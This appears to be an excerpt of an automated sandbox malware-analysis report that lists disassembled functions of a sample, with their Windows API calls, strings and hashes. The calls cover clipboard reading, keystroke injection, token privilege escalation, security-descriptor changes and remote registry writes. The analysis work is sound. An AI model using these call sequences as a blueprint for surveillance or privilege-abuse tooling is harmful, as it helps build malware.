GetCursorPos.USER32(?), ref: 00B9D248
ScreenToClient.USER32(?,?), ref: 00B9D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9D2B1
SendMessageW.USER32 ref: 00B9D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9D31C
SendMessageW.USER32 ref: 00B9D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B9D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B9D37B
GetCursorPos.USER32(?), ref: 00B9D39B
ScreenToClient.USER32(?,?), ref: 00B9D3A8
GetParent.USER32(?), ref: 00B9D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B9D431
SendMessageW.USER32 ref: 00B9D462
ClientToScreen.USER32(?,?), ref: 00B9D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B9D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B9D51A
SendMessageW.USER32 ref: 00B9D53D
ClientToScreen.USER32(?,?), ref: 00B9D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B9D5C3

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

GetWindowLongW.USER32(?,000000F0), ref: 00B9D65F

Strings

F, xrefs: 00B9D543
@GUI_DRAGID, xrefs: 00B9D1AA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 5663b5b04f9886961dae6cb01f4bb1cdcab016e9544a77c67dd0067cc7d26bcc
Instruction ID: 71b27b31be151eb360951b411bac4cf24c05e6e782cd0dcbb60dfb2462e26f06
Opcode Fuzzy Hash: 5663b5b04f9886961dae6cb01f4bb1cdcab016e9544a77c67dd0067cc7d26bcc
Instruction Fuzzy Hash: 6942A230104741AFDB25CF28C854FAABFE6FF49314F1405AEF656872A1DB31A854CB96

Function 00B9804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B9873F

Strings

%d/%02d/%02d, xrefs: 00B98478

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 15a7310b96b2981d41c5c311f910a351ebf48574e8a68ccae19b7ce6f1737add
Instruction ID: ca62b47e516d317748e6b8bad421567ab9a4fc29de0cd8cf79c79276a8033bbb
Opcode Fuzzy Hash: 15a7310b96b2981d41c5c311f910a351ebf48574e8a68ccae19b7ce6f1737add
Instruction Fuzzy Hash: 9A12B071500205ABEF259F64CD89FAA7BF9EF46710F2041AAF919EB2A1DF748941CB10

Function 00B2710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B275C2
_memset.LIBCMT ref: 00B276B1
_memmove.LIBCMT ref: 00B27C4B
_memmove.LIBCMT ref: 00B27E4F

Strings

DEFINE, xrefs: 00B625AF
Q\E, xrefs: 00B281C1
[:>:]], xrefs: 00B2760A
[:<:]], xrefs: 00B275F1
\b(?=\w), xrefs: 00B63C34
\b(?<=\w), xrefs: 00B63C41

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 023b804fc8d3f4d86c3523084216aeefcc8022429fb1db5d95dbf2155a6370b7
Instruction ID: 3adc28872a3c542db13a219423e7252d3b8d857cddf380943a16a21e5da1f000
Opcode Fuzzy Hash: 023b804fc8d3f4d86c3523084216aeefcc8022429fb1db5d95dbf2155a6370b7
Instruction Fuzzy Hash: 0C93A271A00615DFDB24CF58D881BADB7F1FF48710F2485AAE949AB380EB749E81CB54

Function 00B14A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00B14A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4DA8E
IsIconic.USER32(?), ref: 00B4DA97
ShowWindow.USER32(?,00000009), ref: 00B4DAA4
SetForegroundWindow.USER32(?), ref: 00B4DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B4DAC4
GetCurrentThreadId.KERNEL32 ref: 00B4DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B4DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B4DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00B4DAF8
SetForegroundWindow.USER32(?), ref: 00B4DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4DB10
keybd_event.USER32(00000012,00000000), ref: 00B4DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4DB25
keybd_event.USER32(00000012,00000000), ref: 00B4DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4DB33
keybd_event.USER32(00000012,00000000), ref: 00B4DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B4DB42
keybd_event.USER32(00000012,00000000), ref: 00B4DB47
SetForegroundWindow.USER32(?), ref: 00B4DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00B4DB71

Strings

Shell_TrayWnd, xrefs: 00B4DA89

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 239deb88520d51795885eb837581adf8ee08a7340014ea7a7b06082b964e7711
Instruction ID: a116fdb3868566bbeccfce85eb87b3026a68e7446f00f5cfa70a121ff657278f
Opcode Fuzzy Hash: 239deb88520d51795885eb837581adf8ee08a7340014ea7a7b06082b964e7711
Instruction Fuzzy Hash: B5316771A403197BEB215FA19D49F7F3EACEB44B60F114066FA04E71D0CAB05D10AAA1

Function 00B68858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00B68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B68D0D
Part of subcall function 00B68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68D3A
Part of subcall function 00B68CC3: GetLastError.KERNEL32 ref: 00B68D47

_memset.LIBCMT ref: 00B6889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B688ED
CloseHandle.KERNEL32(?), ref: 00B688FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B68915
GetProcessWindowStation.USER32 ref: 00B6892E
SetProcessWindowStation.USER32(00000000), ref: 00B68938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B68952

Part of subcall function 00B68713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B68851), ref: 00B68728
Part of subcall function 00B68713: CloseHandle.KERNEL32(?,?,00B68851), ref: 00B6873A

Strings

winsta0, xrefs: 00B68910
default, xrefs: 00B6894D
, xrefs: 00B688AA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 6a69b521d49ae25a0783b86f18a8b656adacb76b7ef237aca757c2d821fff332
Instruction ID: fde394ceb414b8e9e5d26d8202783b8fe245dbad00dd3c35e26fe6449a93fae7
Opcode Fuzzy Hash: 6a69b521d49ae25a0783b86f18a8b656adacb76b7ef237aca757c2d821fff332
Instruction Fuzzy Hash: F48118B1940209AFDF11DFE4DD45AAE7BB8EF04314F1842AAFD14A6261DF398E14DB60

Function 00B8425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B9F910), ref: 00B84284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B84292
GetClipboardData.USER32(0000000D), ref: 00B8429A
CloseClipboard.USER32 ref: 00B842A6
GlobalLock.KERNEL32(00000000), ref: 00B842C2
CloseClipboard.USER32 ref: 00B842CC
GlobalUnlock.KERNEL32(00000000), ref: 00B842E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00B842EE
GetClipboardData.USER32(00000001), ref: 00B842F6
GlobalLock.KERNEL32(00000000), ref: 00B84303
GlobalUnlock.KERNEL32(00000000), ref: 00B84337
CloseClipboard.USER32 ref: 00B84447

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 164416757d37ef562ace558af329b7223b1c7d6876198385a981c66748bc1fa2
Instruction ID: a7f8882d60fed8542ba74c1f9e18f1d2b589b2623e3822be95c9ffcf18b4d091
Opcode Fuzzy Hash: 164416757d37ef562ace558af329b7223b1c7d6876198385a981c66748bc1fa2
Instruction Fuzzy Hash: 44516871208303ABD711BF60ED96FBA77E8EF84B10F1445AAB556D32A1DF609904CB62

Function 00B7C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B7C9F8
FindClose.KERNEL32(00000000), ref: 00B7CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7CAAF
__swprintf.LIBCMT ref: 00B7CAFB
__swprintf.LIBCMT ref: 00B7CB3E

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

__swprintf.LIBCMT ref: 00B7CB92

Part of subcall function 00B338D8: __woutput_l.LIBCMT ref: 00B33931

__swprintf.LIBCMT ref: 00B7CBE0

Part of subcall function 00B338D8: __flsbuf.LIBCMT ref: 00B33953
Part of subcall function 00B338D8: __flsbuf.LIBCMT ref: 00B3396B

__swprintf.LIBCMT ref: 00B7CC2F
__swprintf.LIBCMT ref: 00B7CC7E
__swprintf.LIBCMT ref: 00B7CCCD

Strings

%4d, xrefs: 00B7CB38
%4d%02d%02d%02d%02d%02d, xrefs: 00B7CAF5
%02d, xrefs: 00B7CB86, 00B7CB90, 00B7CBDE, 00B7CC2D, 00B7CC7C, 00B7CCCB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 0e0d9e48f4e4fac2635bef83777c5c723fded1cc42e5498e60ce74a45226397b
Instruction ID: 8595057129997488fb03f47902a4313111dd67a495aa8dae9eb73a6d803dfe83
Opcode Fuzzy Hash: 0e0d9e48f4e4fac2635bef83777c5c723fded1cc42e5498e60ce74a45226397b
Instruction Fuzzy Hash: C0A15EB1508344ABC710EB64C895DEFB7ECEF94700F80496DF596C3191EA34DA49CB62

Function 00B7F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B7F221
_wcscmp.LIBCMT ref: 00B7F236
_wcscmp.LIBCMT ref: 00B7F24D
GetFileAttributesW.KERNEL32(?), ref: 00B7F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00B7F279
FindNextFileW.KERNEL32(00000000,?), ref: 00B7F291
FindClose.KERNEL32(00000000), ref: 00B7F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7F2B8
_wcscmp.LIBCMT ref: 00B7F2DF
_wcscmp.LIBCMT ref: 00B7F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7F308
SetCurrentDirectoryW.KERNEL32(00BCA5A0), ref: 00B7F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7F330
FindClose.KERNEL32(00000000), ref: 00B7F33D
FindClose.KERNEL32(00000000), ref: 00B7F34F

Strings

*.*, xrefs: 00B7F2B3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 977c9271328cfbd51642cc83acd5c8623c3abdb814d477d00c129d7f76766a50
Instruction ID: 475c52b4e01c76b5d5c1827df43119d635f00be123acfc1ce62f76c7c1a8b61e
Opcode Fuzzy Hash: 977c9271328cfbd51642cc83acd5c8623c3abdb814d477d00c129d7f76766a50
Instruction Fuzzy Hash: 7831637660121A6ADB10DBB4DC49EFE77ECEF49360F1481B6F828D30A0DB34DE458A58

Function 00B90AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B90BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B9F910,00000000,?,00000000,?,?), ref: 00B90C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B90C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B90D1D
RegCloseKey.ADVAPI32(?), ref: 00B9103D
RegCloseKey.ADVAPI32(00000000), ref: 00B9104A

Strings

REG_DWORD, xrefs: 00B90F0E
REG_QWORD, xrefs: 00B90F8B
REG_MULTI_SZ, xrefs: 00B90E05
REG_SZ, xrefs: 00B90D5B
REG_EXPAND_SZ, xrefs: 00B90CBA
REG_BINARY, xrefs: 00B90FD8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 6b301b582f481272ebc524a3c425cad4c7a024891b4677a287d9487c6b7e5349
Instruction ID: 16a6db72b856925fd3c458666fb8f06aef85f22184793c68ece1847271676832
Opcode Fuzzy Hash: 6b301b582f481272ebc524a3c425cad4c7a024891b4677a287d9487c6b7e5349
Instruction Fuzzy Hash: 9A027F752106519FCB14EF14C895E6AB7E5FF88714F0488ADF8999B362CB31ED41CB81

Function 00B7F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B7F37E
_wcscmp.LIBCMT ref: 00B7F393
_wcscmp.LIBCMT ref: 00B7F3AA

Part of subcall function 00B745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B745DC

FindNextFileW.KERNEL32(00000000,?), ref: 00B7F3D9
FindClose.KERNEL32(00000000), ref: 00B7F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7F400
_wcscmp.LIBCMT ref: 00B7F427
_wcscmp.LIBCMT ref: 00B7F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7F450
SetCurrentDirectoryW.KERNEL32(00BCA5A0), ref: 00B7F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7F478
FindClose.KERNEL32(00000000), ref: 00B7F485
FindClose.KERNEL32(00000000), ref: 00B7F497

Strings

*.*, xrefs: 00B7F3FB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 26947591268abd4195bc807897a6f554ab23ad58d2a509ffe6d605686a6e1b6d
Instruction ID: 8dd8436a3657377e318bd9dc33d628eaec6ee38b555ea2e88d5aafee6642661a
Opcode Fuzzy Hash: 26947591268abd4195bc807897a6f554ab23ad58d2a509ffe6d605686a6e1b6d
Instruction Fuzzy Hash: 6C31827160111A6BCB109B64DC89AFA77ECDF49364F1481F6E864E31A0DB34DE448A68

Function 00B681F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B68766
Part of subcall function 00B6874A: GetLastError.KERNEL32(?,00B6822A,?,?,?), ref: 00B68770
Part of subcall function 00B6874A: GetProcessHeap.KERNEL32(00000008,?,?,00B6822A,?,?,?), ref: 00B6877F
Part of subcall function 00B6874A: HeapAlloc.KERNEL32(00000000,?,00B6822A,?,?,?), ref: 00B68786
Part of subcall function 00B6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B6879D

Part of subcall function 00B687E7: GetProcessHeap.KERNEL32(00000008,00B68240,00000000,00000000,?,00B68240,?), ref: 00B687F3
Part of subcall function 00B687E7: HeapAlloc.KERNEL32(00000000,?,00B68240,?), ref: 00B687FA
Part of subcall function 00B687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B68240,?), ref: 00B6880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B6825B
_memset.LIBCMT ref: 00B68270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B6828F
GetLengthSid.ADVAPI32(?), ref: 00B682A0
GetAce.ADVAPI32(?,00000000,?), ref: 00B682DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B682F9
GetLengthSid.ADVAPI32(?), ref: 00B68316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B68325
HeapAlloc.KERNEL32(00000000), ref: 00B6832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B6834D
CopySid.ADVAPI32(00000000), ref: 00B68354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B68385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B683AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B683BF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: e2e1db7b32c232a64e1898222cd836498daccf8813c26e2140ea7dc27b1921c2
Instruction ID: 4d46916c4483dd93317ea3ebb579cff712b7e851a63684d7e95a5fa90d5710d3
Opcode Fuzzy Hash: e2e1db7b32c232a64e1898222cd836498daccf8813c26e2140ea7dc27b1921c2
Instruction Fuzzy Hash: FB613C7190020AABDF009F94DD45AAEBBB9FF04710F1482AAF915E7291DB359A15CB60

Function 00B26843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

UTF16), xrefs: 00B61508
ANYCRLF), xrefs: 00B61734
CRLF), xrefs: 00B616FA
CR), xrefs: 00B616C0
NO_START_OPT), xrefs: 00B61588
NO_AUTO_POSSESS), xrefs: 00B61567
BSR_ANYCRLF), xrefs: 00B61757
LIMIT_MATCH=, xrefs: 00B615A9
ANY), xrefs: 00B61717
UTF), xrefs: 00B61533
BSR_UNICODE), xrefs: 00B61771
UCP), xrefs: 00B61546
LF), xrefs: 00B616DD
LIMIT_RECURSION=, xrefs: 00B61635

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: efed2e2a26ac7ca482adf4272dca5fd4d202b25ad90abc8251792c9d554bb65e
Instruction ID: 3840a597947584f80fa130c76132dd7a05fca77c66eac84ed780cc8a1d26ac16
Opcode Fuzzy Hash: efed2e2a26ac7ca482adf4272dca5fd4d202b25ad90abc8251792c9d554bb65e
Instruction Fuzzy Hash: CA726175E002299BDB24CF59D8817BEB7F5FF48310F1485AAE849EB290DB749D81CB90

Function 00B4418A Relevance: 18.3, APIs: 12, Instructions: 273timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00B441AF

Part of subcall function 00B39E4B: __mtinitlocknum.LIBCMT ref: 00B39E5D
Part of subcall function 00B39E4B: EnterCriticalSection.KERNEL32(00000000,?,00B39CBC,0000000D), ref: 00B39E76

____lc_codepage_func.LIBCMT ref: 00B441F6
__getenv_helper_nolock.LIBCMT ref: 00B44217
_free.LIBCMT ref: 00B4424A

Part of subcall function 00B32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B39C64), ref: 00B32FA9
Part of subcall function 00B32F95: GetLastError.KERNEL32(00000000,?,00B39C64), ref: 00B32FBB

_strlen.LIBCMT ref: 00B44251
__malloc_crt.LIBCMT ref: 00B44258
_strlen.LIBCMT ref: 00B44276
__invoke_watson.LIBCMT ref: 00B44299
